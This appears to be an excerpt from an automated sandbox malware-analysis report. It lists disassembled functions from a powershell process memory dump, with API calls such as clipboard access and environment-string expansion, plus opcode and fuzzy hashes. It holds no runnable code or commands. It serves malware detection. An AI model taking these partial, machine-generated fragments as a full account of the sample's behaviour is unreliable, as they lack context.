                                                                                                • Instruction Fuzzy Hash: 75D0C931845122EBC6121F14EC06B863A58EF06320F060462B540AA071CA64EC5187D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )m)o$DE$b]9$UW$Y[$]_
                                                                                                • API String ID: 0-3859509436
                                                                                                • Opcode ID: 0b31933ebeb5afb7003201750e42ed7dd6a4e63d62e9dd0be7c8ef177d756a74
                                                                                                • Instruction ID: 601459651b70eaa2fed79117ff3d99a9e93fb65611c5b7e629df9d29075e4b3c
                                                                                                • Opcode Fuzzy Hash: 0b31933ebeb5afb7003201750e42ed7dd6a4e63d62e9dd0be7c8ef177d756a74
                                                                                                • Instruction Fuzzy Hash: 6F81467234C3059BD7268F19AC427DFB7D5EBC5314F11993DF6988B382D67488069B82
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 0038B380
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: .N.L$/$/
                                                                                                • API String ID: 237503144-2067240300
                                                                                                • Opcode ID: 358b522b87b11af811670c3ebef2370dfa414cd023657bd452d97266b38e6fcc
                                                                                                • Instruction ID: 181f111c8629b25801b3dcf7f35bc78994ef87c2f403c3ca699725a37938a586
                                                                                                • Opcode Fuzzy Hash: 358b522b87b11af811670c3ebef2370dfa414cd023657bd452d97266b38e6fcc
                                                                                                • Instruction Fuzzy Hash: AAD104715083528BC325DF28C89166BFBF1EFD5324F198A6DE8C59B2A1E734C942CB52
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClipboardGlobal$DataLockLongOpenUnlockWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4075365217-0
                                                                                                • Opcode ID: fb5a48a3a30260fee7b6057efe99646398042c4e1de3f1a9894ae00c13665aa7
                                                                                                • Instruction ID: 94571b06f86b141ce7e57a8e68d81ef530e44e20dac6e20a7242316410824940
                                                                                                • Opcode Fuzzy Hash: fb5a48a3a30260fee7b6057efe99646398042c4e1de3f1a9894ae00c13665aa7
                                                                                                • Instruction Fuzzy Hash: 5541F6B09086919ED702AF7CD44936EFFE0AF02314F05863CE4DA8B691D3799658C7A3
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00395B3F
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00395BC4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: b]9$tu
                                                                                                • API String ID: 237503144-3978716382
                                                                                                • Opcode ID: 1835ad3f4c2308eb95781af1a17f39fd2cc1dc721f37e3e7790f97a39139e210
                                                                                                • Instruction ID: c61fa21ea66b979ee4bfe2b9f60727f2e58b7adba5cf7d9c52587f3b679c1edb
                                                                                                • Opcode Fuzzy Hash: 1835ad3f4c2308eb95781af1a17f39fd2cc1dc721f37e3e7790f97a39139e210
                                                                                                • Instruction Fuzzy Hash: 119111713083049FD7168F28989179FBBE5EBC5718F15892CF5989B392C771980ADB82
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-3916222277
                                                                                                • Opcode ID: 94b9e69caac89514200ac974902a598bcf917ea0ac36f458a20375e1ed37f312
                                                                                                • Instruction ID: a98010c2ea6cdeea8451094e71d5a21e4f1b8ecc957a184484747bf285d9c699
                                                                                                • Opcode Fuzzy Hash: 94b9e69caac89514200ac974902a598bcf917ea0ac36f458a20375e1ed37f312
                                                                                                • Instruction Fuzzy Hash: 92B158B850D3808BD361DF25D5487DBBBE4BB8534CF40891EE6AC9B690CBB49548CF86
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit
                                                                                                • String ID: $$*$-$6$@$B$D$F$H$J$L$N$T$x$z$|$~
                                                                                                • API String ID: 2610073882-889373959
                                                                                                • Opcode ID: 96def5faa15acb81d52929a398b52a5a605d106e3c8c44b6fb39b15666922e4f
                                                                                                • Instruction ID: 7c4c7f6d3545eb8caa77478fc1748fbc26c3a67f53de59ed613967b207254c5f
                                                                                                • Opcode Fuzzy Hash: 96def5faa15acb81d52929a398b52a5a605d106e3c8c44b6fb39b15666922e4f
                                                                                                • Instruction Fuzzy Hash: 514129611087C08FDB16CF38C498746BFA1AFA6218F08C69CC9990F3DBD7799519C7A6
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit
                                                                                                • String ID: $$*$-$6$@$B$D$F$H$J$L$N$T$x$z$|$~
                                                                                                • API String ID: 2610073882-889373959
                                                                                                • Opcode ID: e19ad6af4dbcaa506d654075a6c5958ea25e98fd8997dd5f9e23967cc61fec64
                                                                                                • Instruction ID: aba5399db8ad63efd3dcfebac71b179e9fa3b9a266e078794d35262fc2dd03aa
                                                                                                • Opcode Fuzzy Hash: e19ad6af4dbcaa506d654075a6c5958ea25e98fd8997dd5f9e23967cc61fec64
                                                                                                • Instruction Fuzzy Hash: 234106602087C08EDB16CF28C4D8716BFA16B66218F08C6DCDA994F39BC6B99519C766